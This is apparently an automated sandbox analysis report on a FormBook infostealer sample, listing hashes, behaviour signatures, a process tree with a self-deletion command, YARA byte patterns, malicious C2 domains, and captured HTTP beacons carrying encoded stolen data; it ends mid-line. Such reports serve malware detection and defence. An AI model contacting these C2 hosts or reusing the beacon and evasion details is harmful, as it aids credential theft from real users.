Play interactive tourEdit tour

# Analysis Report R6o4qCis6s.exe

## Overview

### General Information

 Sample Name: R6o4qCis6s.exe Analysis ID: 287799 MD5: 79f04bd1fc5f9757f7979bb8cbefdd5e SHA1: e34056989f520736af44df68d869b71a4d4d695f SHA256: 8aafecddd3b462d27c24000757496edb5c6bce1e6abff9157d5360457b0805d7 Tags: exe Most interesting Screenshot:

### Detection

FormBook
 Score: 100 Range: 0 - 100 Whitelisted: false Confidence: 100%

### Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected FormBook malware
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Contains functionality to detect sleep reduction / modifications
Creates an undocumented autostart registry key
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

### Classification

 System is w10x64R6o4qCis6s.exe (PID: 6652 cmdline: 'C:\Users\user\Desktop\R6o4qCis6s.exe' MD5: 79F04BD1FC5F9757F7979BB8CBEFDD5E)R6o4qCis6s.exe (PID: 6680 cmdline: 'C:\Users\user\Desktop\R6o4qCis6s.exe' MD5: 79F04BD1FC5F9757F7979BB8CBEFDD5E)explorer.exe (PID: 3376 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)explorer.exe (PID: 7040 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)cmd.exe (PID: 368 cmdline: /c del 'C:\Users\user\Desktop\R6o4qCis6s.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)cleanup

## Malware Configuration

No configs have been found
SourceRuleDescriptionAuthorStrings
00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x98d8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x9b42:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x15675:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x15161:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x15777:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x158ef:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0xa55a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x143dc:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xb253:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x1b267:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1c26a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x18349:\$sqlite3step: 68 34 1C 7B E1
• 0x1845c:\$sqlite3step: 68 34 1C 7B E1
• 0x18378:\$sqlite3text: 68 38 2A 90 C5
• 0x1849d:\$sqlite3text: 68 38 2A 90 C5
• 0x1838b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x184b3:\$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x98d8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x9b42:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x15675:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x15161:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x15777:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x158ef:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0xa55a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x143dc:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xb253:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x1b267:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1c26a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Click to see the 22 entries
SourceRuleDescriptionAuthorStrings
0.2.R6o4qCis6s.exe.41b0000.3.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
0.2.R6o4qCis6s.exe.41b0000.3.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x98d8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x9b42:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x15675:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x15161:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x15777:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x158ef:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0xa55a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x143dc:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xb253:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x1b267:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1c26a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.R6o4qCis6s.exe.41b0000.3.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x18349:\$sqlite3step: 68 34 1C 7B E1
• 0x1845c:\$sqlite3step: 68 34 1C 7B E1
• 0x18378:\$sqlite3text: 68 38 2A 90 C5
• 0x1849d:\$sqlite3text: 68 38 2A 90 C5
• 0x1838b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x184b3:\$sqlite3blob: 68 53 D8 7F 8C
0.2.R6o4qCis6s.exe.4170000.2.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
0.2.R6o4qCis6s.exe.4170000.2.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x8ad8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x8d42:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x14875:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x14361:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x14977:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x14aef:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x975a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x135dc:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xa453:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x1a467:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1b46a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Click to see the 19 entries

## Sigma Overview

No Sigma rule has matched

## Signature Overview

### AV Detection:

 Antivirus / Scanner detection for submitted sample Show sources
 Source: R6o4qCis6s.exe Avira: detected
 Antivirus detection for URL or domain Show sources
 Source: http://www.heyidianzib.com/tln/ Avira URL Cloud: Label: malware Source: http://www.heyidianzib.com Avira URL Cloud: Label: malware Source: http://www.heyidianzib.com/tln/www.olisolution.com Avira URL Cloud: Label: malware
 Multi AV Scanner detection for domain / URL Show sources
 Source: www.glowtey.com Virustotal: Detection: 7% Perma Link Source: http://www.glowtey.com/tln/ Virustotal: Detection: 8% Perma Link Source: http://www.glowtey.com Virustotal: Detection: 7% Perma Link
 Multi AV Scanner detection for submitted file Show sources
 Source: R6o4qCis6s.exe Virustotal: Detection: 77% Perma Link Source: R6o4qCis6s.exe ReversingLabs: Detection: 79%
 Yara detected FormBook Show sources
 Source: Yara match File source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000002.482583136.00000000045B0000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000002.476122908.0000000000220000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000001.213014038.0000000000400000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000002.256661656.0000000000D00000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.215688359.0000000004170000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.215724959.00000000041B0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000002.256039719.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.R6o4qCis6s.exe.4170000.2.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack, type: UNPACKEDPE Source: Yara match File source: 1.1.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 1.2.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 1.1.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.R6o4qCis6s.exe.4170000.2.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 1.2.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE
 Machine Learning detection for sample Show sources
 Source: R6o4qCis6s.exe Joe Sandbox ML: detected
 Antivirus or Machine Learning detection for unpacked file Show sources
 Source: 0.2.R6o4qCis6s.exe.4170000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 1.1.R6o4qCis6s.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 1.2.R6o4qCis6s.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
 Contains functionality to enumerate / list files inside a directory Show sources
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00408D20 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 0_2_00408D20 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00405BE0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 0_2_00405BE0

### Networking:

 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) Show sources
 Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49734
 HTTP GET or POST without a user agent Show sources
 Source: global traffic HTTP traffic detected: GET /tln/?TTF=D8Oxqr&jfIlkD=Gih6PLZ1iCkKV6XaU73/B7cCcaHYH4uOLwbm5LWBOFF6YtYGomD/H0QVY53aBPOxn4Dm HTTP/1.1Host: www.cashflowtoday.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /tln/?jfIlkD=aheimOvVxRHS9+ZkV/8M4zSPjXUKcvGCrPlEERzYyjhu9GlhsqSRacAATphOmA3mqti9&TTF=D8Oxqr HTTP/1.1Host: www.themayoparty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 IP address seen in connection with other malware Show sources
 Source: Joe Sandbox View IP Address: 34.102.136.180 34.102.136.180
 Internet Provider seen in connection with other malware Show sources
 Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US Source: Joe Sandbox View ASN Name: GOOGLEUS GOOGLEUS
 Uses a known web browser user agent for HTTP communication Show sources
 Source: global traffic HTTP traffic detected: POST /tln/ HTTP/1.1Host: www.themayoparty.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.themayoparty.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.themayoparty.com/tln/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 66 49 6c 6b 44 3d 53 44 53 59 34 70 6a 41 33 6a 36 6e 38 70 55 4b 56 5a 31 79 6b 58 61 72 72 6e 38 72 62 76 4b 2d 76 4b 59 47 61 43 48 30 7a 57 56 55 34 55 74 77 39 76 6e 57 63 37 74 6e 43 73 73 52 6b 45 6e 4a 6d 74 4c 4a 6b 64 79 35 72 4a 33 4c 73 6f 39 50 58 34 73 6e 46 67 69 4a 56 6d 4a 6f 73 4c 73 31 4e 36 6e 31 6a 41 48 36 30 47 74 52 6d 46 6f 6b 32 51 75 66 52 53 46 32 42 6b 57 58 76 5f 67 4d 4c 33 57 67 74 67 28 4c 50 6a 77 52 5a 38 30 70 63 69 71 33 70 32 50 34 65 32 62 78 68 43 64 55 32 70 6f 59 48 54 73 5a 5a 4f 6e 70 66 42 7a 67 39 67 76 4a 6e 66 35 68 6f 35 49 65 71 34 72 4f 53 6e 35 77 55 4f 76 79 71 52 38 61 7e 55 76 62 51 4c 67 46 45 74 72 69 6c 41 72 50 4e 74 74 52 38 63 68 34 7a 6e 6f 56 4b 50 46 59 62 37 7e 5a 73 70 6c 71 37 7a 47 5f 33 78 38 6e 76 34 46 33 7e 73 4e 62 62 55 64 66 67 2d 34 44 4c 32 61 4f 6e 69 77 31 36 43 78 66 61 43 73 6f 42 30 30 48 49 4b 65 75 57 5a 61 79 76 46 56 56 6f 67 37 52 69 65 53 70 50 75 5a 52 69 4d 64 78 44 56 33 64 30 31 28 6c 59 6f 70 4d 4a 50 79 54 76 33 71 55 49 59 72 79 28 44 49 6e 34 32 76 57 49 72 39 50 63 44 28 37 43 76 46 51 76 4f 36 32 41 6f 51 58 59 59 62 32 6a 57 5a 4b 6f 76 55 46 63 73 76 74 4b 44 74 6b 65 55 35 46 33 31 6c 33 51 44 38 77 31 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jfIlkD=SDSY4pjA3j6n8pUKVZ1ykXarrn8rbvK-vKYGaCH0zWVU4Utw9vnWc7tnCssRkEnJmtLJkdy5rJ3Lso9PX4snFgiJVmJosLs1N6n1jAH60GtRmFok2QufRSF2BkWXv_gML3Wgtg(LPjwRZ80pciq3p2P4e2bxhCdU2poYHTsZZOnpfBzg9gvJnf5ho5Ieq4rOSn5wUOvyqR8a~UvbQLgFEtrilArPNttR8ch4znoVKPFYb7~Zsplq7zG_3x8nv4F3~sNbbUdfg-4DL2aOniw16CxfaCsoB00HIKeuWZayvFVVog7RieSpPuZRiMdxDV3d01(lYopMJPyTv3qUIYry(DIn42vWIr9PcD(7CvFQvO62AoQXYYb2jWZKovUFcsvtKDtkeU5F31l3QD8w1Q). Source: global traffic HTTP traffic detected: POST /tln/ HTTP/1.1Host: www.themayoparty.comConnection: closeContent-Length: 163864Cache-Control: no-cacheOrigin: http://www.themayoparty.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.themayoparty.com/tln/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 66 49 6c 6b 44 3d 53 44 53 59 34 72 44 2d 34 7a 28 5f 74 73 45 4c 48 35 6c 71 67 54 66 31 76 6e 41 34 5a 39 4c 48 77 4b 31 44 61 47 44 77 7e 7a 4a 4b 79 56 39 77 71 36 4c 64 49 4c 74 67 47 63 73 51 7a 55 6a 66 6c 36 33 42 6b 63 47 48 72 4a 28 49 69 37 30 46 57 6f 73 38 45 42 65 31 52 57 31 34 73 4a 6f 51 4e 5a 4c 39 32 77 44 36 77 32 6c 54 6a 55 34 57 78 56 43 61 4e 52 78 5f 48 6d 57 4f 76 4e 6b 65 4b 58 50 50 71 69 62 4e 43 78 73 4b 57 66 73 56 62 78 37 33 7a 79 6e 5f 52 52 79 31 28 56 4e 51 36 49 6f 6d 49 79 73 65 61 2d 28 67 56 6a 71 64 32 78 72 30 6b 50 6f 53 6f 34 51 67 7e 61 7e 51 57 6d 6c 34 54 5f 7a 55 68 41 6f 4c 79 48 72 44 55 4a 49 34 49 49 6a 4e 73 6b 6d 4b 48 64 49 4c 77 2d 6f 39 77 46 5a 72 46 61 31 55 54 75 61 78 71 36 70 79 6d 6a 61 35 37 53 63 72 68 4c 4d 36 35 76 67 30 44 55 64 30 6d 2d 34 58 44 6d 61 59 31 53 46 33 36 7a 42 32 61 45 73 45 4f 77 45 4b 46 70 71 75 59 63 7e 4a 70 31 46 5a 67 77 4c 74 31 4a 79 67 63 63 45 74 6c 4d 64 70 44 58 50 73 30 31 28 48 59 70 70 71 49 36 61 54 76 6e 4c 4b 50 5f 48 2d 32 6a 49 71 39 6e 66 55 54 73 30 45 63 44 6e 37 44 61 70 71 76 39 71 32 45 39 55 51 59 35 62 32 67 6d 5a 4b 6a 50 56 67 55 50 7e 41 48 6a 67 74 4f 58 41 77 36 41 30 42 66 53 74 65 33 79 39 67 72 6d 53 36 5a 6f 58 48 79 67 30 58 73 64 56 62 78 66 63 6b 51 2d 44 78 75 72 4e 30 4f 79 64 63 43 5f 28 4c 77 55 4d 76 35 35 74 58 28 74 4e 67 55 4d 76 59 68 63 51 6d 7a 4c 57 2d 59 76 6b 4e 72 65 61 4a 49 47 57 48 44 53 58 33 35 2d 46 30 76 74 51 67 42 44 35 4d 4e 4f 77 47 49 79 73 78 53 41 45 73 79 32 7a 39 48 6b 73 4d 34 69 6b 77 7a 70 34 32 32 72 70 61 78 70 33 33 35 70 50 6e 53 70 75 34 6b 59 7e 64 4c 62 74 65 47 73 5a 45 33 49 28 51 54 30 55 4e 4b 66 62 4b 46 48 77 71 36 68 54 6e 48 32 49 6c 4f 6c 50 75 43 72 43 62 48 65 73 67 33 32 7e 74 49 50 54 38 79 53 44 63 52 47 68 55 57 6a 51 76 6e 45 47 61 47 35 50 38 4e 62 42 48 6d 67 52 4c 7a 66 6d 2d 50 44 46 64 62 61 33 6c 7a 4a 6e 4f 43 39 61 48 6f 74 73 49 5a 55 65 31 7a 34 4f 70 37 4c 78 52 63 41 48 4a 45 31 6f 7a 45 39 5a 31 48 72 5a 56 6f 5a 4f 4b 6d 51 59 69 7e 36 31 68 78 5a 67 63 50 4e 4f 42 4b 6d 76 79 73 7a 66 77 43 35 43 79 6f 43 69 73 41 2d 77 57 6d 68 54 49 6a 77 5a 32 49 37 7e 57 43 77 70 51 33 67 68 63 46 49 39 4c 41 5a 56 30 62 61 74 49 48 47 74 64 30 6a 57 6c 5a 66 39 4a 73 43 4d 62 46 46 44 6f 55 67 6b 74 7a 48 6e 4a 42 41 41 6b 44 41 72 59 64 34 57 4d 4c 70 50 67 6a 74 5a 53 39 72 4e 6d 49 58 35 64 56 5a 76 74 55 70 72 58 4e 68 34 51 72 5f 30 4e 72 36 64 55 48 68 65 4a 28 2d 39 6c 74 59 72 6d 77 75 52 38 6f 70 33 56 45 53 75 43 70 2d 30 75 38 66 50 36 47 6a 66 4
 Source: global traffic HTTP traffic detected: GET /tln/?TTF=D8Oxqr&jfIlkD=Gih6PLZ1iCkKV6XaU73/B7cCcaHYH4uOLwbm5LWBOFF6YtYGomD/H0QVY53aBPOxn4Dm HTTP/1.1Host: www.cashflowtoday.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /tln/?jfIlkD=aheimOvVxRHS9+ZkV/8M4zSPjXUKcvGCrPlEERzYyjhu9GlhsqSRacAATphOmA3mqti9&TTF=D8Oxqr HTTP/1.1Host: www.themayoparty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Performs DNS lookups Show sources
 Source: unknown DNS traffic detected: queries for: www.cashflowtoday.net
 Posts data to webserver Show sources
 Source: unknown HTTP traffic detected: POST /tln/ HTTP/1.1Host: www.themayoparty.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.themayoparty.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.themayoparty.com/tln/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 66 49 6c 6b 44 3d 53 44 53 59 34 70 6a 41 33 6a 36 6e 38 70 55 4b 56 5a 31 79 6b 58 61 72 72 6e 38 72 62 76 4b 2d 76 4b 59 47 61 43 48 30 7a 57 56 55 34 55 74 77 39 76 6e 57 63 37 74 6e 43 73 73 52 6b 45 6e 4a 6d 74 4c 4a 6b 64 79 35 72 4a 33 4c 73 6f 39 50 58 34 73 6e 46 67 69 4a 56 6d 4a 6f 73 4c 73 31 4e 36 6e 31 6a 41 48 36 30 47 74 52 6d 46 6f 6b 32 51 75 66 52 53 46 32 42 6b 57 58 76 5f 67 4d 4c 33 57 67 74 67 28 4c 50 6a 77 52 5a 38 30 70 63 69 71 33 70 32 50 34 65 32 62 78 68 43 64 55 32 70 6f 59 48 54 73 5a 5a 4f 6e 70 66 42 7a 67 39 67 76 4a 6e 66 35 68 6f 35 49 65 71 34 72 4f 53 6e 35 77 55 4f 76 79 71 52 38 61 7e 55 76 62 51 4c 67 46 45 74 72 69 6c 41 72 50 4e 74 74 52 38 63 68 34 7a 6e 6f 56 4b 50 46 59 62 37 7e 5a 73 70 6c 71 37 7a 47 5f 33 78 38 6e 76 34 46 33 7e 73 4e 62 62 55 64 66 67 2d 34 44 4c 32 61 4f 6e 69 77 31 36 43 78 66 61 43 73 6f 42 30 30 48 49 4b 65 75 57 5a 61 79 76 46 56 56 6f 67 37 52 69 65 53 70 50 75 5a 52 69 4d 64 78 44 56 33 64 30 31 28 6c 59 6f 70 4d 4a 50 79 54 76 33 71 55 49 59 72 79 28 44 49 6e 34 32 76 57 49 72 39 50 63 44 28 37 43 76 46 51 76 4f 36 32 41 6f 51 58 59 59 62 32 6a 57 5a 4b 6f 76 55 46 63 73 76 74 4b 44 74 6b 65 55 35 46 33 31 6c 33 51 44 38 77 31 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jfIlkD=SDSY4pjA3j6n8pUKVZ1ykXarrn8rbvK-vKYGaCH0zWVU4Utw9vnWc7tnCssRkEnJmtLJkdy5rJ3Lso9PX4snFgiJVmJosLs1N6n1jAH60GtRmFok2QufRSF2BkWXv_gML3Wgtg(LPjwRZ80pciq3p2P4e2bxhCdU2poYHTsZZOnpfBzg9gvJnf5ho5Ieq4rOSn5wUOvyqR8a~UvbQLgFEtrilArPNttR8ch4znoVKPFYb7~Zsplq7zG_3x8nv4F3~sNbbUdfg-4DL2aOniw16CxfaCsoB00HIKeuWZayvFVVog7RieSpPuZRiMdxDV3d01(lYopMJPyTv3qUIYry(DIn42vWIr9PcD(7CvFQvO62AoQXYYb2jWZKovUFcsvtKDtkeU5F31l3QD8w1Q).
 Urls found in memory or binary data Show sources
 Contains functionality to read the clipboard data Show sources
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00424C58 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader, 0_2_00424C58
 Contains functionality to retrieve information about pressed keystrokes Show sources
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0043A784 GetKeyboardState, 0_2_0043A784

### E-Banking Fraud:

 Yara detected FormBook Show sources
 Source: Yara match File source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000002.482583136.00000000045B0000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000002.476122908.0000000000220000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000001.213014038.0000000000400000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000002.256661656.0000000000D00000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.215688359.0000000004170000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.215724959.00000000041B0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000002.256039719.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.R6o4qCis6s.exe.4170000.2.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack, type: UNPACKEDPE Source: Yara match File source: 1.1.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 1.2.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 1.1.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.R6o4qCis6s.exe.4170000.2.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 1.2.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE

### System Summary:

 Detected FormBook malware Show sources
 Malicious sample detected (through community Yara rule) Show sources
 Source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000005.00000002.482583136.00000000045B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000005.00000002.482583136.00000000045B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000005.00000002.476122908.0000000000220000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000005.00000002.476122908.0000000000220000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000001.00000001.213014038.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000001.00000001.213014038.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000001.00000002.256661656.0000000000D00000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000001.00000002.256661656.0000000000D00000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000000.00000002.215688359.0000000004170000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000000.00000002.215688359.0000000004170000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000000.00000002.215724959.00000000041B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at 